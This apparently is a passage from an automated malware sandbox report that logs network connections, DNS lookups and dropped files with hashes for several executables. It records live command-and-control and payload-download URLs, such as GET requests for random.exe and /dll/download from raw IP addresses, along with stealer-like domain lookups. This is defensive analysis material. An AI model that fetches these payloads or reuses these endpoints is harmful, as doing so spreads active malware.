                      4b025ca5ea.exe
                      1.3kB
                      698 B
                      8
                      7

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.4kB
                      967 B
                      9
                      8

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.4kB
                      967 B
                      9
                      8

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 95.216.181.44:443
                      tls
                      4b025ca5ea.exe
                      1.3kB
                      927 B
                      8
                      7
                    • 95.216.181.44:443
                      https://95.216.181.44/
                      tls, http
                      4b025ca5ea.exe
                      1.2kB
                      658 B
                      6
                      6

                      HTTP Request

                      POST https://95.216.181.44/

                      HTTP Response

                      200
                    • 185.215.113.16:80
                      http://185.215.113.16/off/random.exe
                      http
                      skotes.exe
                      118.8kB
                      5.8MB
                      2387
                      4148

                      HTTP Request

                      GET http://185.215.113.16/well/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/steam/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/off/random.exe

                      HTTP Response

                      200
                    • 104.21.58.186:443
                      https://covery-mover.biz/api
                      tls, http
                      45c3c2bb5b.exe
                      980 B
                      4.3kB
                      9
                      9

                      HTTP Request

                      POST https://covery-mover.biz/api

                      HTTP Response

                      200
                    • 185.215.113.206:80
                      http://185.215.113.206/c4becf79229cb002.php
                      http
                      1206054524.exe
                      727 B
                      625 B
                      5
                      5

                      HTTP Request

                      GET http://185.215.113.206/

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.206/c4becf79229cb002.php

                      HTTP Response

                      200
                    • 127.0.0.1:49669
                      firefox.exe
                    • 127.0.0.1:49679
                      firefox.exe
                    • 172.217.18.206:443
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      tls, http2
                      firefox.exe
                      3.9kB
                      10.5kB
                      21
                      24

                      HTTP Request

                      GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                      HTTP Request

                      GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    • 34.120.5.221:443
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      tls, http2
                      firefox.exe
                      3.1kB
                      13.6kB
                      16
                      20

                      HTTP Request

                      GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    • 23.214.143.155:443
                      https://steamcommunity.com/profiles/76561199724331900
                      tls, http
                      45c3c2bb5b.exe
                      1.4kB
                      42.9kB
                      19
                      36

                      HTTP Request

                      GET https://steamcommunity.com/profiles/76561199724331900

                      HTTP Response

                      200
                    • 34.117.121.53:443
                      firefox-settings-attachments.cdn.mozilla.net
                      tls
                      firefox.exe
                      1.8kB
                      21.3kB
                      19
                      26
                    • 216.58.214.174:443
                      www.youtube.com
                      tls
                      firefox.exe
                      977 B
                      6.9kB
                      10
                      8
                    • 142.250.179.110:443
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      tls, http2
                      firefox.exe
                      3.1kB
                      76.4kB
                      36
                      67

                      HTTP Request

                      GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    • 172.217.20.164:443
                      https://www.google.com/favicon.ico
                      tls, http2
                      firefox.exe
                      1.8kB
                      7.5kB
                      15
                      17

                      HTTP Request

                      GET https://www.google.com/favicon.ico
                    • 80.82.65.70:80
                      http://80.82.65.70/soft/download
                      http
                      777b33ea97.exe
                      34.0kB
                      1.9MB
                      577
                      1399

                      HTTP Request

                      GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/dll/key

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/dll/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/files/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/soft/download

                      HTTP Response

                      200

                      HTTP Request

                      GET http://80.82.65.70/soft/download

                      HTTP Response

                      200
                    • 88.221.134.155:80
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      http
                      firefox.exe
                      6.3kB
                      467.4kB
                      130
                      347

                      HTTP Request

                      GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                      HTTP Response

                      200
                    • 172.217.20.174:443
                      redirector.gvt1.com
                      tls
                      firefox.exe
                      1.6kB
                      8.9kB
                      17
                      21
                    • 209.85.226.6:443
                      r1---sn-5hnekn76.gvt1.com
                      tls
                      firefox.exe
                      198.0kB
                      8.8MB
                      3286
                      6300
                    • 216.58.214.174:443
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      tls, http2
                      firefox.exe
                      2.7kB
                      8.7kB
                      17
                      21

                      HTTP Request

                      POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                    • 8.8.8.8:53
                      drive-connect.cyou
                      dns
                      45c3c2bb5b.exe
                      64 B
                      96 B
                      1
                      1

                      DNS Request

                      drive-connect.cyou

                      DNS Response

                      172.67.139.78
                      104.21.79.7

                    • 8.8.8.8:53
                      t.me
                      dns
                      4b025ca5ea.exe
                      50 B
                      66 B
                      1
                      1

                      DNS Request

                      t.me

                      DNS Response

                      149.154.167.99

                    • 8.8.8.8:53
                      steamcommunity.com
                      dns
                      45c3c2bb5b.exe
                      64 B
                      80 B
                      1
                      1

                      DNS Request

                      steamcommunity.com

                      DNS Response

                      23.214.143.155

                    • 8.8.8.8:53
                      se-blurry.biz
                      dns
                      45c3c2bb5b.exe
                      59 B
                      121 B
                      1
                      1

                      DNS Request

                      se-blurry.biz

                    • 8.8.8.8:53
                      zinc-sneark.biz
                      dns
                      45c3c2bb5b.exe
                      61 B
                      123 B
                      1
                      1

                      DNS Request

                      zinc-sneark.biz

                    • 8.8.8.8:53
                      dwell-exclaim.biz
                      dns
                      45c3c2bb5b.exe
                      63 B
                      125 B
                      1
                      1

                      DNS Request

                      dwell-exclaim.biz

                    • 8.8.8.8:53
                      formy-spill.biz
                      dns
                      45c3c2bb5b.exe
                      61 B
                      123 B
                      1
                      1

                      DNS Request

                      formy-spill.biz

                    • 8.8.8.8:53
                      covery-mover.biz
                      dns
                      45c3c2bb5b.exe
                      62 B
                      94 B
                      1
                      1

                      DNS Request

                      covery-mover.biz

                      DNS Response

                      104.21.58.186
                      172.67.206.64

                    • 8.8.8.8:53
                      dare-curbys.biz
                      dns
                      45c3c2bb5b.exe
                      122 B
                      246 B
                      2
                      2

                      DNS Request

                      dare-curbys.biz

                      DNS Request

                      dare-curbys.biz

                    • 8.8.8.8:53
                      print-vexer.biz
                      dns
                      45c3c2bb5b.exe
                      61 B
                      123 B
                      1
                      1

                      DNS Request

                      print-vexer.biz

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      spocs.getpocket.com
                      dns
                      firefox.exe
                      65 B
                      131 B
                      1
                      1

                      DNS Request

                      spocs.getpocket.com

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      getpocket.cdn.mozilla.net
                      dns
                      firefox.exe
                      71 B
                      174 B
                      1
                      1

                      DNS Request

                      getpocket.cdn.mozilla.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      175 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      171 B
                      85 B
                      3
                      1

                      DNS Request

                      youtube.com

                      DNS Request

                      youtube.com

                      DNS Request

                      youtube.com

                      DNS Response

                      2a00:1450:4007:805::200e

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      68 B
                      116 B
                      1
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Response

                      54.213.181.160
                      35.85.93.176
                      44.228.225.150

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      164 B
                      110 B
                      2
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      2600:1901:0:524c::

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      204 B
                      153 B
                      3
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Request

                      shavar.prod.mozaws.net

                    • 8.8.8.8:53
                      impend-differ.biz
                      dns
                      45c3c2bb5b.exe
                      126 B
                      125 B
                      2
                      1

                      DNS Request

                      impend-differ.biz

                      DNS Request

                      impend-differ.biz

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      206 B
                      119 B
                      2
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      34.160.144.191

                    • 8.8.8.8:53
                      firefox-settings-attachments.cdn.mozilla.net
                      dns
                      firefox.exe
                      90 B
                      177 B
                      1
                      1

                      DNS Request

                      firefox-settings-attachments.cdn.mozilla.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      94 B
                      110 B
                      1
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.149.100.209

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      94 B
                      187 B
                      1
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      122 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      199 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      103 B
                      131 B
                      1
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      2600:1901:0:92a9::

                    • 172.217.18.206:443
                      youtube.com
                      https
                      firefox.exe
                      1.9kB
                      9.3kB
                      6
                      10
                    • 8.8.8.8:53
                      www.youtube.com
                      dns
                      firefox.exe
                      61 B
                      287 B
                      1
                      1

                      DNS Request

                      www.youtube.com

                      DNS Response

                      216.58.214.174
                      216.58.215.46
                      172.217.20.174
                      172.217.18.206
                      216.58.214.78
                      142.250.75.238
                      142.250.201.174
                      142.250.179.78
                      142.250.178.142
                      142.250.179.110
                      142.250.74.238
                      172.217.20.206

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      69 B
                      277 B
                      1
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      216.58.215.46
                      172.217.20.206
                      172.217.18.206
                      142.250.179.78
                      216.58.213.78
                      142.250.179.110
                      172.217.20.174
                      216.58.214.78
                      142.250.75.238
                      142.250.74.238
                      216.58.214.174
                      142.250.178.142
                      142.250.201.174

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      69 B
                      181 B
                      1
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      2a00:1450:4007:810::200e
                      2a00:1450:4007:808::200e
                      2a00:1450:4007:80e::200e
                      2a00:1450:4007:80c::200e

                    • 216.58.214.174:443
                      youtube-ui.l.google.com
                      https
                      firefox.exe
                      3.6kB
                      9.4kB
                      10
                      11
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      93 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      2a00:1450:4007:818::200e

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      4.1kB
                      10.5kB
                      11
                      14
                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      76 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      76 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      88 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      2a00:1450:4007:80c::2004

                    • 172.217.20.164:443
                      www.google.com
                      https
                      firefox.exe
                      3.3kB
                      10.7kB
                      8
                      11
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                      DNS Response

                      35.244.181.201

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      175 B
                      1
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                    • 8.8.8.8:53
                      ciscobinary.openh264.org
                      dns
                      firefox.exe
                      70 B
                      286 B
                      1
                      1

                      DNS Request

                      ciscobinary.openh264.org

                      DNS Response

                      88.221.134.155
                      88.221.134.209

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      67 B
                      99 B
                      1
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      88.221.134.209
                      88.221.134.155

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      67 B
                      123 B
                      1
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      2a02:26f0:a1::58dd:86d1
                      2a02:26f0:a1::58dd:869b

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      93 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      2a00:1450:4007:80c::200e

                    • 172.217.20.174:443
                      redirector.gvt1.com
                      https
                      firefox.exe
                      3.3kB
                      9.3kB
                      8
                      10
                    • 8.8.8.8:53
                      r1---sn-5hnekn76.gvt1.com
                      dns
                      firefox.exe
                      71 B
                      116 B
                      1
                      1

                      DNS Request

                      r1---sn-5hnekn76.gvt1.com

                      DNS Response

                      209.85.226.6

                    • 8.8.8.8:53
                      r1.sn-5hnekn76.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      85 B
                      1
                      1

                      DNS Request

                      r1.sn-5hnekn76.gvt1.com

                      DNS Response

                      209.85.226.6

                    • 8.8.8.8:53
                      r1.sn-5hnekn76.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      97 B
                      1
                      1

                      DNS Request

                      r1.sn-5hnekn76.gvt1.com

                      DNS Response

                      2a00:1450:400e::6

                    • 209.85.226.6:443
                      r1.sn-5hnekn76.gvt1.com
                      https
                      firefox.exe
                      1.9kB
                      5.9kB
                      6
                      7
                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      77 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      216.58.214.174

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      77 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      216.58.214.174

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      89 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      2a00:1450:4007:80e::200e

                    • 216.58.214.174:443
                      play.google.com
                      https
                      firefox.exe
                      3.2kB
                      9.3kB
                      7
                      10
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      2.3kB
                      3.3kB
                      4
                      7
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      Filesize

                      342B

                      MD5

                      ae28cb12d04906b24cbf14c4d0eb0e0b

                      SHA1

                      0b7e97222c6316af3b741a3f8fb830d83368e321

                      SHA256

                      83c85c334d10e8049a65a1cb87c05ca84ecfad581903af0a0c604b29038bab66

                      SHA512

                      4680455243b7907c88726b4a5eb89d3b93b8d27d1a1798607b03e27ccc02cb66422932feebcf6f2170a226e20820fb69d3dec8d8a144adbf2755a56d4f54c17f

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\download[1].htm

                      Filesize

                      1B

                      MD5

                      cfcd208495d565ef66e7dff9f98764da

                      SHA1

                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                      SHA256

                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                      SHA512

                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\activity-stream.discovery_stream.json.tmp

                      Filesize

                      26KB

                      MD5

                      cf9a4e9a7c2d2cd17467defdd2917f9c

                      SHA1

                      34a709618a03f1d7fe10f60a39b2946669e6e686

                      SHA256

                      6f0d0f2bc04735495a631f77061693ba5fb9ad6778887f792b3245ed1ff43d3a

                      SHA512

                      8e4ce4f5e397dff4158c0e68ac6502b9423200c4692470231b28d58f4ed973049f02aba4ce682da719ffaf36ded53e953ad0590644afd6721a49c770779099e0

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                      Filesize

                      15KB

                      MD5

                      96c542dec016d9ec1ecc4dddfcbaac66

                      SHA1

                      6199f7648bb744efa58acf7b96fee85d938389e4

                      SHA256

                      7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                      SHA512

                      cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                    • C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe

                      Filesize

                      2.5MB

                      MD5

                      2a78ce9f3872f5e591d643459cabe476

                      SHA1

                      9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                      SHA256

                      21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                      SHA512

                      03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                    • C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe

                      Filesize

                      4.2MB

                      MD5

                      3a425626cbd40345f5b8dddd6b2b9efa

                      SHA1

                      7b50e108e293e54c15dce816552356f424eea97a

                      SHA256

                      ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1

                      SHA512

                      a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

                    • C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe

                      Filesize

                      710KB

                      MD5

                      28e568616a7b792cac1726deb77d9039

                      SHA1

                      39890a418fb391b823ed5084533e2e24dff021e1

                      SHA256

                      9597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2

                      SHA512

                      85048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5

                    • C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe

                      Filesize

                      384KB

                      MD5

                      dfd5f78a711fa92337010ecc028470b4

                      SHA1

                      1a389091178f2be8ce486cd860de16263f8e902e

                      SHA256

                      da96f2eb74e60de791961ef3800c36a5e12202fe97ae5d2fcfc1fe404bc13c0d

                      SHA512

                      a3673074919039a2dc854b0f91d1e1a69724056594e33559741f53594e0f6e61e3d99ec664d541b17f09ffdebc2de1b042eec19ca8477fac86359c703f8c9656

                    • C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe

                      Filesize

                      947KB

                      MD5

                      2b793b7e00aacec7453b8ca6238ad4a0

                      SHA1

                      def1fd67a33e309516d869994410400d46059374

                      SHA256

                      507b1bae81af31e9056bbd4c844ebd5d9c1effc334ec88be84213354d5a7ad79

                      SHA512

                      071126d83167a0790cfc12d5731b9fe1cd3701e80f2740f387f623cdb1a5ca20a8a9128709479e93a306702994f1421d6d9c3d0063644b307d1c2d0f8773a65e

                    • C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe

                      Filesize

                      1.7MB

                      MD5

                      eb7861db86d764ae3b2dd28c25df4e8b

                      SHA1

                      c2aec1fc6a4cf79b7e7638fee8267b30a009f497

                      SHA256

                      06ecb21bf180b171d744be8d51d9871247df34335af18c765e4998cd7623a70c

                      SHA512

                      3d5157794ee86bd9a4ba82fcf480b3fc8863e3cb23a3fb4fbb4b51a86568b1ebf6aa1464969a4178f7a6af3ba3c5a28cdf057ff41c1a5f39dc5b0af9385f2ee0

                    • C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe

                      Filesize

                      2.7MB

                      MD5

                      b69945d1db14dd60fe5ec67a889ed0ea

                      SHA1

                      437706c61a5ba9c49b632bf9690ebc65f6d7733c

                      SHA256

                      083ce305a6a1d062753562488a62c43bb85e6a80425f56f3303ff2d3b01eb7d9

                      SHA512

                      692a4065f49fc546063c15944bb5ccf7f41c33dba07f6e9e052f972f9651fc9268f02fb7085382045d46b69cb425a20e72472e04af15946e20fdeada94aeb07f

                    • C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe

                      Filesize

                      1.9MB

                      MD5

                      0a2e0cf36cb5586fb3ecff4872b27b9d

                      SHA1

                      b8ab43272fbbad21c1985ee536ecd5ccbdc0a761

                      SHA256

                      417e7e396fbadbf07bf6952dbd3c0b6b496bc18871047645879db777552552b1

                      SHA512

                      54f788a088be98537649567c9c9c1c13fb148502900862832b91438a4e0ea1cfab5d8c465834059556f2799d83390ef2bc07efa6c3a63b225484528c2e85eedf

                    • C:\Users\Admin\AppData\Local\Temp\Cab47AC.tmp

                      Filesize

                      70KB

                      MD5

                      49aebf8cbd62d92ac215b2923fb1b9f5

                      SHA1

                      1723be06719828dda65ad804298d0431f6aff976

                      SHA256

                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                      SHA512

                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                    • C:\Users\Admin\AppData\Local\Temp\Tar47BF.tmp

                      Filesize

                      181KB

                      MD5

                      4ea6026cf93ec6338144661bf1202cd1

                      SHA1

                      a1dec9044f750ad887935a01430bf49322fbdcb7

                      SHA256

                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                      SHA512

                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                      Filesize

                      1.6MB

                      MD5

                      72491c7b87a7c2dd350b727444f13bb4

                      SHA1

                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                      SHA256

                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                      SHA512

                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                      Filesize

                      458KB

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

                      Filesize

                      2.2MB

                      MD5

                      579a63bebccbacab8f14132f9fc31b89

                      SHA1

                      fca8a51077d352741a9c1ff8a493064ef5052f27

                      SHA256

                      0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0

                      SHA512

                      4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

                      Filesize

                      1.7MB

                      MD5

                      5659eba6a774f9d5322f249ad989114a

                      SHA1

                      4bfb12aa98a1dc2206baa0ac611877b815810e4c

                      SHA256

                      e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4

                      SHA512

